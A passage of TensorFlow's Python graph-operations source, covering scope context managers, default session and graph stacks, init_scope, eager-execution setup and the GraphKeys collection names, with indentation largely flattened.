"strings to AttrValue protocol buffers or "
"callables that emit AttrValue protocol buffers")
try:
saved_attrs[name] = self._attr_scope_map[name]
except KeyError:
pass
if attr is None:
del self._attr_scope_map[name]
else:
self._attr_scope_map[name] = attr
try:
yield # The code within the context runs here.
finally:
# Remove the attributes set for this context, and restore any saved
# attributes.
for name, attr in attr_map.items():
try:
self._attr_scope_map[name] = saved_attrs[name]
except KeyError:
del self._attr_scope_map[name]
# pylint: enable=g-doc-return-or-yield
# pylint: disable=g-doc-return-or-yield
@tf_contextlib.contextmanager
def _kernel_label_map(self, op_to_kernel_label_map):
"""EXPERIMENTAL: A context manager for setting kernel labels.
This context manager can be used to select particular
implementations of kernels within the scope of the context.
For example:
with ops.Graph().as_default() as g:
f_1 = Foo() # Uses the default registered kernel for the Foo op.
with g.kernel_label_map({"Foo": "v_2"}):
f_2 = Foo() # Uses the registered kernel with label "v_2"
# for the Foo op.
with g.kernel_label_map({"Foo": "v_3"}):
f_3 = Foo() # Uses the registered kernel with label "v_3"
# for the Foo op.
with g.kernel_label_map({"Foo": ""}):
f_4 = Foo() # Uses the default registered kernel
# for the Foo op.
Args:
op_to_kernel_label_map: A dictionary mapping op type strings to
kernel label strings.
Returns:
A context manager that sets the kernel label to be used for one or more
ops created in that context.
Raises:
TypeError: If op_to_kernel_label_map is not a dictionary mapping
strings to strings.
"""
if not isinstance(op_to_kernel_label_map, dict):
raise TypeError("op_to_kernel_label_map must be a dictionary mapping "
"strings to strings")
# The saved_labels dictionary stores any currently-set labels that
# will be overridden by this context manager.
saved_labels = {}
# Install the given label
for op_type, label in op_to_kernel_label_map.items():
if not (isinstance(op_type, six.string_types) and
isinstance(label, six.string_types)):
raise TypeError("op_to_kernel_label_map must be a dictionary mapping "
"strings to strings")
try:
saved_labels[op_type] = self._op_to_kernel_label_map[op_type]
except KeyError:
pass
self._op_to_kernel_label_map[op_type] = label
try:
yield # The code within the context runs here.
finally:
# Remove the labels set for this context, and restore any saved labels.
for op_type, label in op_to_kernel_label_map.items():
try:
self._op_to_kernel_label_map[op_type] = saved_labels[op_type]
except KeyError:
del self._op_to_kernel_label_map[op_type]
# pylint: enable=g-doc-return-or-yield
# pylint: disable=g-doc-return-or-yield
@tf_contextlib.contextmanager
def gradient_override_map(self, op_type_map):
"""EXPERIMENTAL: A context manager for overriding gradient functions.
This context manager can be used to override the gradient function
that will be used for ops within the scope of the context.
For example:
```python
@tf.RegisterGradient("CustomSquare")
def _custom_square_grad(op, grad):
# ...
with tf.Graph().as_default() as g:
c = tf.constant(5.0)
s_1 = tf.square(c) # Uses the default gradient for tf.square.
with g.gradient_override_map({"Square": "CustomSquare"}):
        s_2 = tf.square(c) # Uses _custom_square_grad to compute the
# gradient of s_2.
```
Args:
op_type_map: A dictionary mapping op type strings to alternative op
type strings.
Returns:
A context manager that sets the alternative op type to be used for one
or more ops created in that context.
Raises:
TypeError: If `op_type_map` is not a dictionary mapping strings to
strings.
"""
if not isinstance(op_type_map, dict):
raise TypeError("op_type_map must be a dictionary mapping "
"strings to strings")
# The saved_mappings dictionary stores any currently-set mappings that
# will be overridden by this context manager.
saved_mappings = {}
    # Install the given override mapping
for op_type, mapped_op_type in op_type_map.items():
if not (isinstance(op_type, six.string_types) and
isinstance(mapped_op_type, six.string_types)):
raise TypeError("op_type_map must be a dictionary mapping "
"strings to strings")
try:
saved_mappings[op_type] = self._gradient_override_map[op_type]
except KeyError:
pass
self._gradient_override_map[op_type] = mapped_op_type
try:
yield # The code within the context runs here.
finally:
      # Remove the mappings set for this context, and restore any saved mappings.
for op_type, mapped_op_type in op_type_map.items():
try:
self._gradient_override_map[op_type] = saved_mappings[op_type]
except KeyError:
del self._gradient_override_map[op_type]
# pylint: enable=g-doc-return-or-yield
def prevent_feeding(self, tensor):
"""Marks the given `tensor` as unfeedable in this graph."""
self._unfeedable_tensors.add(tensor)
def is_feedable(self, tensor):
"""Returns `True` if and only if `tensor` is feedable."""
return tensor not in self._unfeedable_tensors
def prevent_fetching(self, op):
"""Marks the given `op` as unfetchable in this graph."""
self._unfetchable_ops.add(op)
def is_fetchable(self, tensor_or_op):
"""Returns `True` if and only if `tensor_or_op` is fetchable."""
if isinstance(tensor_or_op, Tensor):
return tensor_or_op.op not in self._unfetchable_ops
else:
return tensor_or_op not in self._unfetchable_ops
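  # Example (a minimal sketch, assuming a graph `g`, a tensor `t` and an op `op`):
  #   g.prevent_feeding(t)
  #   assert not g.is_feedable(t)
  #   g.prevent_fetching(op)
  #   assert not g.is_fetchable(op)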
def switch_to_thread_local(self):
"""Make device, colocation and dependencies stacks thread-local.
    Device, colocation and dependencies stacks are not thread-local by default.
If multiple threads access them, then the state is shared. This means that
one thread may affect the behavior of another thread.
After this method is called, the stacks become thread-local. If multiple
threads access them, then the state is not shared. Each thread uses its own
value; a thread doesn't affect other threads by mutating such a stack.
The initial value for every thread's stack is set to the current value
of the stack when `switch_to_thread_local()` was first called.
"""
if not self._stack_state_is_thread_local:
self._stack_state_is_thread_local = True
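  # Example (a minimal sketch): after `g.switch_to_thread_local()` is called,
  # a `with g.device("/cpu:0"):` block entered on one thread no longer affects
  # ops being created concurrently on other threads.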
@property
def _device_function_stack(self):
if self._stack_state_is_thread_local:
# This may be called from a thread where device_function_stack doesn't yet
# exist.
if not hasattr(self._thread_local, "_device_function_stack"):
self._thread_local._device_function_stack = (
self._graph_device_function_stack[:])
return self._thread_local._device_function_stack
else:
return self._graph_device_function_stack
@_device_function_stack.setter
def _device_function_stack(self, device_function_stack):
if self._stack_state_is_thread_local:
self._thread_local._device_function_stack = device_function_stack
else:
self._graph_device_function_stack = device_function_stack
@property
def _colocation_stack(self):
if self._stack_state_is_thread_local:
# This may be called from a thread where colocation_stack doesn't yet
# exist.
if not hasattr(self._thread_local, "_colocation_stack"):
self._thread_local._colocation_stack = self._graph_colocation_stack[:]
return self._thread_local._colocation_stack
else:
return self._graph_colocation_stack
@_colocation_stack.setter
def _colocation_stack(self, colocation_stack):
if self._stack_state_is_thread_local:
self._thread_local._colocation_stack = colocation_stack
else:
self._graph_colocation_stack = colocation_stack
@property
def _control_dependencies_stack(self):
if self._stack_state_is_thread_local:
# This may be called from a thread where control_dependencies_stack
# doesn't yet exist.
if not hasattr(self._thread_local, "_control_dependencies_stack"):
self._thread_local._control_dependencies_stack = (
self._graph_control_dependencies_stack[:])
return self._thread_local._control_dependencies_stack
else:
return self._graph_control_dependencies_stack
@_control_dependencies_stack.setter
def _control_dependencies_stack(self, control_dependencies):
if self._stack_state_is_thread_local:
self._thread_local._control_dependencies_stack = control_dependencies
else:
self._graph_control_dependencies_stack = control_dependencies
# TODO(agarwal): currently device directives in an outer eager scope will not
# apply to inner graph mode code. Fix that.
@tf_export("device")
def device(device_name_or_function):
"""Wrapper for `Graph.device()` using the default graph.
See
@{tf.Graph.device}
for more details.
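  For example (a minimal sketch; the device string depends on the machine):
  ```python
  with tf.device("/cpu:0"):
    a = tf.constant(1.0)  # Placed on the CPU.
  ```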
Args:
device_name_or_function: The device name or function to use in
the context.
Returns:
A context manager that specifies the default device to use for newly
created ops.
Raises:
RuntimeError: If eager execution is enabled and a function is passed in.
"""
if context.executing_eagerly():
# TODO(agarwal): support device functions in EAGER mode.
if callable(device_name_or_function):
raise RuntimeError(
"tf.device does not support functions when eager execution "
"is enabled.")
return context.device(device_name_or_function)
else:
return get_default_graph().device(device_name_or_function)
@tf_export("container")
def container(container_name):
"""Wrapper for `Graph.container()` using the default graph.
Args:
container_name: The container string to use in the context.
Returns:
A context manager that specifies the default container to use for newly
created stateful ops.
"""
return get_default_graph().container(container_name)
def _colocate_with_for_gradient(op, gradient_uid, ignore_existing=False):
if context.executing_eagerly():
if op is not None:
return device(op.device)
else:
return _NullContextmanager()
else:
default_graph = get_default_graph()
if isinstance(op, EagerTensor):
if default_graph.building_function:
return default_graph.device(op.device)
else:
raise ValueError("Encountered an Eager-defined Tensor during graph "
"construction, but a function was not being built.")
return default_graph._colocate_with_for_gradient(
op, gradient_uid=gradient_uid, ignore_existing=ignore_existing)
@tf_export("colocate_with")
def colocate_with(op, ignore_existing=False):
return _colocate_with_for_gradient(op, None, ignore_existing=ignore_existing)
@tf_export("control_dependencies")
def control_dependencies(control_inputs):
"""Wrapper for `Graph.control_dependencies()` using the default graph.
See @{tf.Graph.control_dependencies}
for more details.
When eager execution is enabled, any callable object in the `control_inputs`
list will be called.
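  For example, when eager execution is enabled (a minimal sketch):
  ```python
  def send_heartbeat():
    print("heartbeat")  # Stand-in for an arbitrary side effect.
  with tf.control_dependencies([send_heartbeat]):
    pass  # `send_heartbeat` has already been called by this point.
  ```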
Args:
control_inputs: A list of `Operation` or `Tensor` objects which
must be executed or computed before running the operations
defined in the context. Can also be `None` to clear the control
dependencies. If eager execution is enabled, any callable object in the
`control_inputs` list will be called.
Returns:
A context manager that specifies control dependencies for all
operations constructed within the context.
"""
if context.executing_eagerly():
if control_inputs:
      # Execute any pending callables.
for control in control_inputs:
if callable(control):
control()
return _NullContextmanager()
else:
return get_default_graph().control_dependencies(control_inputs)
class _DefaultStack(threading.local):
"""A thread-local stack of objects for providing implicit defaults."""
def __init__(self):
super(_DefaultStack, self).__init__()
self._enforce_nesting = True
self.stack = []
def get_default(self):
return self.stack[-1] if len(self.stack) >= 1 else None
def reset(self):
self.stack = []
def is_cleared(self):
return not self.stack
@property
def enforce_nesting(self):
return self._enforce_nesting
@enforce_nesting.setter
def enforce_nesting(self, value):
self._enforce_nesting = value
@tf_contextlib.contextmanager
def get_controller(self, default):
"""A context manager for manipulating a default stack."""
try:
self.stack.append(default)
yield default
finally:
# stack may be empty if reset() was called
if self.stack:
if self._enforce_nesting:
if self.stack[-1] is not default:
raise AssertionError(
"Nesting violated for default stack of %s objects" %
type(default))
self.stack.pop()
else:
self.stack.remove(default)
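# Example (a minimal sketch of how a default stack behaves):
#   _stack = _DefaultStack()
#   with _stack.get_controller("outer"):
#     assert _stack.get_default() == "outer"
#     with _stack.get_controller("inner"):
#       assert _stack.get_default() == "inner"
#   assert _stack.get_default() is None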
_default_session_stack = _DefaultStack() # pylint: disable=protected-access
def default_session(session):
"""Python "with" handler for defining a default session.
This function provides a means of registering a session for handling
Tensor.eval() and Operation.run() calls. It is primarily intended for use
by session.Session, but can be used with any object that implements
the Session.run() interface.
Use with the "with" keyword to specify that Tensor.eval() and Operation.run()
invocations within the scope of a block should be executed by a particular
session.
The default session applies to the current thread only, so it is always
possible to inspect the call stack and determine the scope of a default
session. If you create a new thread, and wish to use the default session
in that thread, you must explicitly add a "with ops.default_session(sess):"
block in that thread's function.
Example:
The following code examples are equivalent:
# 1. Using the Session object directly:
sess = ...
c = tf.constant(5.0)
sess.run(c)
# 2. Using default_session():
sess = ...
with ops.default_session(sess):
c = tf.constant(5.0)
result = c.eval()
# 3. Overriding default_session():
sess = ...
with ops.default_session(sess):
c = tf.constant(5.0)
with ops.default_session(...):
c.eval(session=sess)
Args:
session: The session to be installed as the default session.
Returns:
A context manager for the default session.
"""
return _default_session_stack.get_controller(session)
@tf_export("get_default_session")
def get_default_session():
"""Returns the default session for the current thread.
The returned `Session` will be the innermost session on which a
`Session` or `Session.as_default()` context has been entered.
NOTE: The default session is a property of the current thread. If you
create a new thread, and wish to use the default session in that
thread, you must explicitly add a `with sess.as_default():` in that
thread's function.
Returns:
The default `Session` being used in the current thread.
"""
return _default_session_stack.get_default()
def _eval_using_default_session(tensors, feed_dict, graph, session=None):
"""Uses the default session to evaluate one or more tensors.
Args:
tensors: A single Tensor, or a list of Tensor objects.
feed_dict: A dictionary that maps Tensor objects (or tensor names) to lists,
numpy ndarrays, TensorProtos, or strings.
graph: The graph in which the tensors are defined.
session: (Optional) A different session to use to evaluate "tensors".
Returns:
Either a single numpy ndarray if "tensors" is a single tensor; or a list
of numpy ndarrays that each correspond to the respective element in
"tensors".
Raises:
ValueError: If no default session is available; the default session
does not have "graph" as its graph; or if "session" is specified,
and it does not have "graph" as its graph.
"""
if session is None:
session = get_default_session()
if session is None:
raise ValueError("Cannot evaluate tensor using `eval()`: No default "
"session is registered. Use `with "
"sess.as_default()` or pass an explicit session to "
"`eval(session=sess)`")
if session.graph is not graph:
raise ValueError("Cannot use the default session to evaluate tensor: "
"the tensor's graph is different from the session's "
"graph. Pass an explicit session to "
"`eval(session=sess)`.")
else:
if session.graph is not graph:
raise ValueError("Cannot use the given session to evaluate tensor: "
"the tensor's graph is different from the session's "
"graph.")
return session.run(tensors, feed_dict)
def _run_using_default_session(operation, feed_dict, graph, session=None):
"""Uses the default session to run "operation".
Args:
operation: The Operation to be run.
feed_dict: A dictionary that maps Tensor objects (or tensor names) to lists,
numpy ndarrays, TensorProtos, or strings.
graph: The graph in which "operation" is defined.
session: (Optional) A different session to use to run "operation".
Raises:
ValueError: If no default session is available; the default session
does not have "graph" as its graph; or if "session" is specified,
and it does not have "graph" as its graph.
"""
if session is None:
session = get_default_session()
if session is None:
raise ValueError("Cannot execute operation using `run()`: No default "
"session is registered. Use `with "
"sess.as_default():` or pass an explicit session to "
"`run(session=sess)`")
if session.graph is not graph:
raise ValueError("Cannot use the default session to execute operation: "
"the operation's graph is different from the "
"session's graph. Pass an explicit session to "
"run(session=sess).")
else:
if session.graph is not graph:
raise ValueError("Cannot use the given session to execute operation: "
"the operation's graph is different from the session's "
"graph.")
session.run(operation, feed_dict)
class _DefaultGraphStack(_DefaultStack): # pylint: disable=protected-access
"""A thread-local stack of objects for providing an implicit default graph."""
def __init__(self):
super(_DefaultGraphStack, self).__init__()
self._global_default_graph = None
def get_default(self):
"""Override that returns a global default if the stack is empty."""
ret = super(_DefaultGraphStack, self).get_default()
if ret is None:
ret = self._GetGlobalDefaultGraph()
return ret
def _GetGlobalDefaultGraph(self):
if self._global_default_graph is None:
      # TODO(mrry): Perhaps log that the default graph is being used, or
      # provide some other feedback to prevent confusion when a mixture of
# the global default graph and an explicit graph are combined in the
# same process.
self._global_default_graph = Graph()
return self._global_default_graph
def reset(self):
super(_DefaultGraphStack, self).reset()
self._global_default_graph = None
@tf_contextlib.contextmanager
def get_controller(self, default):
try:
context.context().context_switches.push(
default.building_function, default.as_default)
with super(_DefaultGraphStack, self).get_controller(
default) as g, context.graph_mode():
yield g
finally:
context.context().context_switches.pop()
_default_graph_stack = _DefaultGraphStack()
# pylint: disable=g-doc-return-or-yield,line-too-long
@tf_contextlib.contextmanager
def init_scope():
"""A context manager that lifts ops out of control-flow scopes and function-building graphs.
There is often a need to lift variable initialization ops out of control-flow
scopes, function-building graphs, and gradient tapes. Entering an
`init_scope` is a mechanism for satisfying these desiderata. In particular,
entering an `init_scope` has three effects:
(1) All control dependencies are cleared the moment the scope is entered;
this is equivalent to entering the context manager returned from
`control_dependencies(None)`, which has the side-effect of exiting
control-flow scopes like `tf.cond` and `tf.while_loop`.
(2) All operations that are created while the scope is active are lifted
into the lowest context on the `context_stack` that is not building a
graph function. Here, a context is defined as either a graph or an eager
context. Every context switch, i.e., every installation of a graph as
the default graph and every switch into eager mode, is logged in a
thread-local stack called `context_switches`; the log entry for a
context switch is popped from the stack when the context is exited.
Entering an `init_scope` is equivalent to crawling up
`context_switches`, finding the first context that is not building a
graph function, and entering it. A caveat is that if graph mode is
enabled but the default graph stack is empty, then entering an
`init_scope` will simply install a fresh graph as the default one.
(3) The gradient tape is paused while the scope is active.
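  For example (a minimal sketch; `make_counter` is a hypothetical helper that
  may be traced inside a function-building graph):
  ```python
  def make_counter():
    with init_scope():
      # Created in the outermost context, with control dependencies cleared
      # and the gradient tape paused.
      return tf.Variable(0, name="counter")
  ```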
"""
# pylint: enable=g-doc-return-or-yield,line-too-long
if context.executing_eagerly():
# Fastpath.
with tape.stop_recording():
yield
else:
# Retrieve the active name scope: entering an `init_scope` preserves
# the name scope of the current context.
default_graph = get_default_graph()
scope = default_graph.get_name_scope()
if scope and scope[-1] != '/':
# Names that end with trailing slashes are treated by `name_scope` as
# absolute.
scope = scope + '/'
inner_device_stack = default_graph._device_function_stack # pylint: disable=protected-access
outer_context = None
if not _default_graph_stack.stack:
# If the default graph stack is empty, then we cannot be building a
# function. Install the global graph (which, in this case, is also the
# default graph) as the outer context.
if default_graph.building_function:
raise RuntimeError("The global graph is building a function.")
outer_context = default_graph.as_default
else:
# Find a context that is not building a function.
for stack_entry in reversed(context.context().context_switches.stack):
if not stack_entry.is_building_function:
outer_context = stack_entry.enter_context_fn
break
if outer_context is None:
# As a last resort, obtain the global default graph; this graph doesn't
# necessarily live on the graph stack (and hence it doesn't necessarily
# live on the context stack), but it is stored in the graph stack's
# encapsulating object.
outer_context = _default_graph_stack._GetGlobalDefaultGraph().as_default # pylint: disable=protected-access
if outer_context is None:
# Sanity check; this shouldn't be triggered.
raise RuntimeError("All graphs are building functions, and no "
"eager context was previously active.")
outer_graph = None
outer_device_stack = None
try:
with outer_context(), name_scope(scope), control_dependencies(
None), tape.stop_recording():
if not context.executing_eagerly():
# The device stack is preserved when lifting into a graph. Eager
# execution doesn't implement device stacks and in particular it
# doesn't support device functions, so in general it's not possible
# to do the same when lifting into the eager context.
outer_graph = get_default_graph()
outer_device_stack = outer_graph._device_function_stack # pylint: disable=protected-access
outer_graph._device_function_stack = inner_device_stack # pylint: disable=protected-access
yield
finally:
if outer_graph is not None:
outer_graph._device_function_stack = outer_device_stack # pylint: disable=protected-access
@tf_export("enable_eager_execution")
def enable_eager_execution(config=None, device_policy=None,
execution_mode=None):
"""Enables eager execution for the lifetime of this program.
Eager execution provides an imperative interface to TensorFlow. With eager
execution enabled, TensorFlow functions execute operations immediately (as
opposed to adding to a graph to be executed later in a @{tf.Session}) and
return concrete values (as opposed to symbolic references to a node in a
computational graph).
For example:
```python
tf.enable_eager_execution()
# After eager execution is enabled, operations are executed as they are
# defined and Tensor objects hold concrete values, which can be accessed as
  # numpy.ndarray objects through the numpy() method.
assert tf.multiply(6, 7).numpy() == 42
```
Eager execution cannot be enabled after TensorFlow APIs have been used to
create or execute graphs. It is typically recommended to invoke this function
at program startup and not in a library (as most libraries should be usable
both with and without eager execution).
Args:
config: (Optional.) A @{tf.ConfigProto} to use to configure the environment
in which operations are executed. Note that @{tf.ConfigProto} is also
used to configure graph execution (via @{tf.Session}) and many options
within `tf.ConfigProto` are not implemented (or are irrelevant) when
eager execution is enabled.
device_policy: (Optional.) Policy controlling how operations requiring
      inputs on a specific device (e.g., GPU 0) handle inputs on a different
      device (e.g., GPU 1 or CPU). When set to None, an appropriate value will be
picked automatically. The value picked may change between TensorFlow
releases.
Valid values:
- tf.contrib.eager.DEVICE_PLACEMENT_EXPLICIT: raises an error if the
placement is not correct.
- tf.contrib.eager.DEVICE_PLACEMENT_WARN: copies the tensors which are not
on the right device but logs a warning.
- tf.contrib.eager.DEVICE_PLACEMENT_SILENT: silently copies the tensors.
Note that this may hide performance problems as there is no notification
provided when operations are blocked on the tensor being copied between
devices.
- tf.contrib.eager.DEVICE_PLACEMENT_SILENT_FOR_INT32: silently copies
int32 tensors, raising errors on the other ones.
execution_mode: (Optional.) Policy controlling how operations dispatched are
actually executed. When set to None, an appropriate value will be picked
automatically. The value picked may change between TensorFlow releases.
Valid values:
- tf.contrib.eager.SYNC: executes each operation synchronously.
- tf.contrib.eager.ASYNC: executes each operation asynchronously. These
operations may return "non-ready" handles.
Raises:
ValueError: If eager execution is enabled after creating/executing a
TensorFlow graph, or if options provided conflict with a previous call
to this function.
"""
if config is not None and not isinstance(config, config_pb2.ConfigProto):
raise TypeError(
"config must be a tf.ConfigProto, but got %s" % type(config))
if device_policy not in (None, context.DEVICE_PLACEMENT_EXPLICIT,
context.DEVICE_PLACEMENT_WARN,
context.DEVICE_PLACEMENT_SILENT,
context.DEVICE_PLACEMENT_SILENT_FOR_INT32):
raise ValueError(
"device_policy must be one of None, tf.contrib.eager.DEVICE_PLACEMENT_*"
)
if execution_mode not in (None, context.SYNC, context.ASYNC):
raise ValueError(
"execution_mode must be one of None, tf.contrib.eager.SYNC, "
"tf.contrib.eager.ASYNC")
# pylint: disable=protected-access
if context._default_mode == context.GRAPH_MODE:
graph_mode_has_been_used = (
_default_session_stack.stack
or len(get_default_graph().get_operations()) > 0) # pylint: disable=g-explicit-length-test
if graph_mode_has_been_used:
raise ValueError(
"tf.enable_eager_execution must be called at program startup.")
context._default_mode = context.EAGER_MODE
if context._context is None:
context._context = context.Context(
config=config,
device_policy=device_policy,
execution_mode=execution_mode)
elif ((config is not None and config is not context._context._config) or
(device_policy is not None and
device_policy is not context._context._device_policy) or
(execution_mode is not None and
execution_mode is not context._context._execution_mode)):
raise ValueError("Trying to change the options of an active eager"
" execution. Context config: %s, specified config:"
" %s. Context device policy: %s, specified device"
" policy: %s. Context execution mode: %s, "
" specified execution mode %s." %
(context._context._config, config,
context._context._device_policy, device_policy,
context._context._execution_mode, execution_mode))
else:
raise ValueError(
"tf.enable_eager_execution must be called at program startup.")
# Monkey patch to get rid of an unnecessary conditional since the context is
# now initialized.
context.context = context.context_safe
def eager_run(main=None, argv=None):
"""Runs the program with an optional main function and argv list.
The program will run with eager execution enabled.
Example:
```python
import tensorflow as tf
# Import subject to future changes:
from tensorflow.contrib.eager.python import tfe
def main(_):
u = tf.constant(6.0)
v = tf.constant(7.0)
print(u * v)
if __name__ == "__main__":
tfe.run()
```
Args:
main: the main function to run.
argv: the arguments to pass to it.
"""
enable_eager_execution()
app.run(main, argv)
@tf_export("reset_default_graph")
def reset_default_graph():
"""Clears the default graph stack and resets the global default graph.
NOTE: The default graph is a property of the current thread. This
function applies only to the current thread. Calling this function while
a `tf.Session` or `tf.InteractiveSession` is active will result in undefined
behavior. Using any previously created `tf.Operation` or `tf.Tensor` objects
after calling this function will result in undefined behavior.
Raises:
AssertionError: If this function is called within a nested graph.
"""
if not _default_graph_stack.is_cleared():
raise AssertionError("Do not use tf.reset_default_graph() to clear "
"nested graphs. If you need a cleared graph, "
"exit the nesting and create a new graph.")
_default_graph_stack.reset()
@tf_export("get_default_graph")
def get_default_graph():
"""Returns the default graph for the current thread.
The returned graph will be the innermost graph on which a
`Graph.as_default()` context has been entered, or a global default
graph if none has been explicitly created.
NOTE: The default graph is a property of the current thread. If you
create a new thread, and wish to use the default graph in that
thread, you must explicitly add a `with g.as_default():` in that
thread's function.
Returns:
The default `Graph` being used in the current thread.
"""
return _default_graph_stack.get_default()
def has_default_graph():
"""Returns True if there is a default graph."""
return len(_default_graph_stack.stack) >= 1
def get_name_scope():
"""Returns the current name scope in the default_graph.
For example:
```python
with tf.name_scope('scope1'):
with tf.name_scope('scope2'):
print(tf.get_name_scope())
```
would print the string `scope1/scope2`.
Returns:
A string representing the current name scope.
"""
if context.executing_eagerly():
return context.context().scope_name.rstrip("/")
return get_default_graph().get_name_scope()
def _assert_same_graph(original_item, item):
"""Fail if the 2 items are from different graphs.
Args:
original_item: Original item to check against.
item: Item to check.
Raises:
ValueError: if graphs do not match.
"""
if original_item.graph is not item.graph:
raise ValueError("%s must be from the same graph as %s." % (item,
original_item))
def _get_graph_from_inputs(op_input_list, graph=None):
"""Returns the appropriate graph to use for the given inputs.
This library method provides a consistent algorithm for choosing the graph
in which an Operation should be constructed:
1. If the default graph is being used to construct a function, we
use the default graph.
2. If the "graph" is specified explicitly, we validate that all of the inputs
in "op_input_list" are compatible with that graph.
3. Otherwise, we attempt to select a graph from the first Operation-
or Tensor-valued input in "op_input_list", and validate that all other
such inputs are in the same graph.
4. If the graph was not specified and it could not be inferred from
"op_input_list", we attempt to use the default graph.
Args:
op_input_list: A list of inputs to an operation, which may include `Tensor`,
`Operation`, and other objects that may be converted to a graph element.
graph: (Optional) The explicit graph to use.
Raises:
TypeError: If op_input_list is not a list or tuple, or if graph is not a
Graph.
ValueError: If a graph is explicitly passed and not all inputs are from it,
or if the inputs are from multiple graphs, or we could not find a graph
and there was no default graph.
Returns:
The appropriate graph to use for the given inputs.
"""
if get_default_graph().building_function:
return get_default_graph()
op_input_list = tuple(op_input_list) # Handle generators correctly
if graph and not isinstance(graph, Graph):
raise TypeError("Input graph needs to be a Graph: %s" % graph)
# 1. We validate that all of the inputs are from the same graph. This is
# either the supplied graph parameter, or the first one selected from one
  # of the graph-element-valued inputs. In the latter case, we hold onto
# that input in original_graph_element so we can provide a more
# informative error if a mismatch is found.
original_graph_element = None
for op_input in op_input_list:
# Determine if this is a valid graph_element.
# TODO(josh11b): Note that we exclude subclasses of Tensor. Need to clean this
# up.
graph_element = None
if (isinstance(op_input, (Operation, _TensorLike)) and
((not isinstance(op_input, Tensor)) or type(op_input) == Tensor)): # pylint: disable=unidiomatic-typecheck
graph_element = op_input
else:
graph_element = _as_graph_element(op_input)
if graph_element is not None:
if not graph:
original_graph_element = graph_element
graph = graph_element.graph
elif original_graph_element is not None:
_assert_same_graph(original_graph_element, graph_element)
elif graph_element.graph is not graph:
raise ValueError("%s is not from the passed-in graph." % graph_element)
# 2. If all else fails, we use the default graph, which is always there.
return graph or get_default_graph()
@tf_export("GraphKeys")
class GraphKeys(object):
"""Standard names to use for graph collections.
The standard library uses various well-known names to collect and
retrieve values associated with a graph. For example, the
`tf.Optimizer` subclasses default to optimizing the variables
collected under `tf.GraphKeys.TRAINABLE_VARIABLES` if none is
specified, but it is also possible to pass an explicit list of
variables.
The following standard keys are defined:
* `GLOBAL_VARIABLES`: the default collection of `Variable` objects, shared
across distributed environment (model variables are subset of these). See
@{tf.global_variables}
for more details.
Commonly, all `TRAINABLE_VARIABLES` variables will be in `MODEL_VARIABLES`,
and all `MODEL_VARIABLES` variables will be in `GLOBAL_VARIABLES`.
* `LOCAL_VARIABLES`: the subset of `Variable` objects that are local to each
    machine. Usually used for temporary variables, like counters.
Note: use `tf.contrib.framework.local_variable` to add to this collection.
* `MODEL_VARIABLES`: the subset of `Variable` objects that are used in the
model for inference (feed forward). Note: use
`tf.contrib.framework.model_variable` to add to this collection.
* `TRAINABLE_VARIABLES`: the subset of `Variable` objects that will
be trained by an optimizer. See
@{tf.trainable_variables}
for more details.
* `SUMMARIES`: the summary `Tensor` objects that have been created in the
graph. See
@{tf.summary.merge_all}
for more details.
* `QUEUE_RUNNERS`: the `QueueRunner` objects that are used to
produce input for a computation. See
@{tf.train.start_queue_runners}
for more details.
* `MOVING_AVERAGE_VARIABLES`: the subset of `Variable` objects that will also
keep moving averages. See
@{tf.moving_average_variables}
for more details.
* `REGULARIZATION_LOSSES`: regularization losses collected during graph
construction.
The following standard keys are _defined_, but their collections are **not**
automatically populated as many of the others are:
* `WEIGHTS`
* `BIASES`
* `ACTIVATIONS`
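  For example (a minimal sketch):
  ```python
  w = tf.Variable(tf.zeros([10]), name="w")
  tf.add_to_collection(tf.GraphKeys.WEIGHTS, w)      # WEIGHTS is not auto-populated.
  weights = tf.get_collection(tf.GraphKeys.WEIGHTS)  # -> [w]
  ```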
"""
# Key to collect Variable objects that are global (shared across machines).
# Default collection for all variables, except local ones.
GLOBAL_VARIABLES = "variables"
# Key to collect local variables that are local to the machine and are not
# saved/restored.
LOCAL_VARIABLES = "local_variables"
  # Key to collect local variables which are used to accumulate internal state
# to be used in tf.metrics.*.
METRIC_VARIABLES = "metric_variables"
# Key to collect model variables defined by layers.
MODEL_VARIABLES = "model_variables"
# Key to collect Variable objects that will be trained by the
# optimizers.
TRAINABLE_VARIABLES = "trainable_variables"
# Key to collect summaries.
SUMMARIES = "summaries"
# Key to collect QueueRunners.
QUEUE_RUNNERS = "queue_runners"
# Key to collect table initializers.
TABLE_INITIALIZERS = "table_initializer"
# Key to collect asset filepaths. An asset represents an external resource
# like a vocabulary file.
ASSET_FILEPATHS = "asset_filepaths"
# Key to collect Variable objects that keep moving averages.
MOVING_AVERAGE_VARIABLES = "moving_average_variables"
# Key to collect regularization losses at graph construction.
REGULARIZATION_LOSSES = "regularization_losses"
# Key to collect concatenated sharded variables.
CONCATENATED_VARIABLES = "concatenated_variables"
# Key to collect savers.
SAVERS = "savers"
# Key to collect weights
WEIGHTS = "weights"
# Key to collect biases
BIASES = "biases"
# Key to collect activations
ACTIVATIONS = "activations"
# Key to collect update_ops
UPDATE_OPS = "update_ops"
# Key to collect losses
LOSSES = "losses"
# Key to collect BaseSaverBuilder.SaveableObject instances for checkpointing.
SAVEABLE_OBJECTS = "saveable_objects"
# Key to collect all shared resources used by the graph which need to be
# initialized once per cluster.
RESOURCES = "resources"
# Key to collect all shared resources used in this graph which need to be
# initialized once per session.
LOCAL_RESOURCES = "local_resources"
# Trainable resource-style variables.
TRAINABLE_RESOURCE_VARIABLES = "trainable_resource_variables"
# Key to indicate various ops.
INIT_OP = "init_op"
LOCAL_INIT_OP = "local_init_op"
READY_OP = "ready_op"
READY_FOR_LOCAL_INIT_OP = "ready_for_local_init_op"
SUMMARY_OP = "summary_op"
GLOBAL_STEP = "global_step"
# Used to count the number of evaluations performed during a single evaluation
# run.
EVAL_STEP = "eval_step"
TRAIN_OP = "train_op"
# Key for control flow context.
COND_CONTEXT = "cond_context"
WHILE_CONTEXT = "while_context"
# Used to store v2 summary names.
_SUMMARY_COLLECTION = "_SUMMARY_V2"
# List of all collections that keep track of variables.
_VARIABLE_COLLECTIONS = [
GLOBAL_VARIABLES,
LOCAL_VARIABLES,
METRIC_VARIABLES,
MODEL_VARIABLES,
TRAINABLE_VARIABLES,
MOVING_AVERAGE_VARIABLES,
CONCATENATED_VARIABLES,
TRAINABLE_RESOURCE_VARIABLES,
]
# Key for streaming model ports.
# NOTE(yuanbyu): internal and experimental.
_STREAMING_MODEL_PORTS = "streaming_model_ports"
@decorator_utils.classproperty
def VARIABLES(cls): # pylint: disable=no-self-argument
logging.log_first_n(logging.WARN,
"VARIABLES collection name is deprecated, please use "
"GLOBAL_VARIABLES instead; VARIABLES will be removed "
"after 2017-03-02.", 1)
